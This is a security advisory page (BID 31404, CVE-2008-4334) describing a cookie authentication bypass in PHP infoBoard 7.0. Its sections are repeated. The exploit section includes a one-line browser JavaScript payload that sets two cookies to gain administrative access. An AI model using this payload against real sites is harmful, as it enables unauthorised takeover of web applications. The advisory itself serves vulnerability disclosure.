PHP infoBoard Cookie Authentication Bypass Vulnerability
BID:31404
Info
PHP infoBoard Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 31404 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-4334 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 25 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | Stack |
| Vulnerable: |
dooidea team PHP infoBoard 7.0 |
| Not Vulnerable: | |
Discussion
PHP infoBoard Cookie Authentication Bypass Vulnerability
PHP infoBoard is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
PHP infoBoard 7.0 is vulnerable; other versions may also be affected.
PHP infoBoard is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
PHP infoBoard 7.0 is vulnerable; other versions may also be affected.
Exploit / POC
PHP infoBoard Cookie Authentication Bypass Vulnerability
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
Solution / Fix
PHP infoBoard Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP infoBoard Cookie Authentication Bypass Vulnerability
References:
References:
- PHP infoBoard Homepage (dooidea team)